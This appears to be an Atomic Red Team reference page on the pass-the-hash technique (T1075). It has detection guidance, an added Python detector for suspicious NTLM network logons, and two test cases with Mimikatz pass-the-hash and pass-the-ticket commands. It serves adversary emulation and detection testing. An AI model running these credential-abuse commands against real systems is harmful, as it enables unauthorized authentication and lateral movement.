T1075 - Pass the Hash

Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)

Detection: Audit all logon and credential use events and review them for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated with a domain login and are not anonymous logins are suspicious.
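As an added, constructed example (not code from this Atomic Red Team page), the heuristic above applied to Windows Security event 4624 records: the record keys mirror 4624's EventData field names, the set of trusted domain names is assumed to be known to the caller, and the sample events are made up.

```python
"""Flag NTLM LogonType 3 authentications that are neither domain logons
nor anonymous logons, the heuristic given in the detection guidance.

Assumptions (not from the original page): each record is a dict whose keys
mirror the EventData fields of Security event 4624; the caller supplies the
domain names it trusts. The sample events below are constructed.
"""
from typing import Iterable, List, Set

ANONYMOUS = {"ANONYMOUS LOGON", "-"}


def is_suspicious_ntlm_logon(event: dict, domains: Set[str]) -> bool:
    """True for an NTLM network logon (type 3) by a non-anonymous account
    whose TargetDomainName is not one of the trusted domains."""
    if str(event.get("LogonType")) != "3":
        return False
    if event.get("AuthenticationPackageName", "").upper() != "NTLM":
        return False
    if event.get("TargetUserName", "").upper() in ANONYMOUS:
        return False
    # A domain account carries the domain's name; a local account carries the
    # target machine's name, which is the "not a domain login" case.
    target_domain = event.get("TargetDomainName", "").upper()
    return target_domain not in {d.upper() for d in domains}


def flag_events(events: Iterable[dict], domains: Set[str]) -> List[dict]:
    """Return the suspicious events, annotated with whether the account is the
    built-in RID 500 Administrator that the page singles out."""
    flagged = []
    for ev in events:
        if is_suspicious_ntlm_logon(ev, domains):
            rid500 = str(ev.get("TargetUserSid", "")).endswith("-500")
            flagged.append(dict(ev, rid500=rid500))
    return flagged


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"LogonType": 3, "AuthenticationPackageName": "Kerberos", "TargetUserName": "alice",
     "TargetDomainName": "ATOMIC", "TargetUserSid": "S-1-5-21-1-2-3-1104", "IpAddress": "10.0.0.5"},
    {"LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserName": "ANONYMOUS LOGON",
     "TargetDomainName": "NT AUTHORITY", "TargetUserSid": "S-1-5-7", "IpAddress": "10.0.0.9"},
    {"LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserName": "Administrator",
     "TargetDomainName": "WS01", "TargetUserSid": "S-1-5-21-9-8-7-500", "IpAddress": "10.0.0.42"},
    {"LogonType": 3, "AuthenticationPackageName": "NTLM", "TargetUserName": "bob",
     "TargetDomainName": "ATOMIC", "TargetUserSid": "S-1-5-21-1-2-3-1105", "IpAddress": "10.0.0.6"},
]

if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS, {"ATOMIC"}):
        print(hit["IpAddress"], hit["TargetDomainName"], hit["TargetUserName"],
              "(RID 500)" if hit["rid500"] else "")
```

Only the local-account NTLM logon from WS01 is flagged; the Kerberos domain logon, the anonymous logon and the NTLM domain logon are not.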

Platforms: Windows

Data Sources: Authentication logs

System Requirements: Requires Microsoft Windows as target system

Contributors: Travis Smith, Tripwire

Atomic Tests


Atomic Test #1 - Mimikatz Pass the Hash

Note: you must dump hashes first (see Reference).

Supported Platforms: Windows

Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user | username | string | Administrator |
| domain | domain | string | atomic.local |
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a |

Run it with command_prompt!

```
mimikatz # sekurlsa::pth /user:${user} /domain:${domain} /ntlm:${ntlm}
```


Atomic Test #2 - Mimikatz Kerberos Ticket Attack

Similar to PtH, but against Kerberos (pass the ticket).

Supported Platforms: Windows

Run it with command_prompt!

```
mimikatz # kerberos::ptt ${username}@${Domain}
```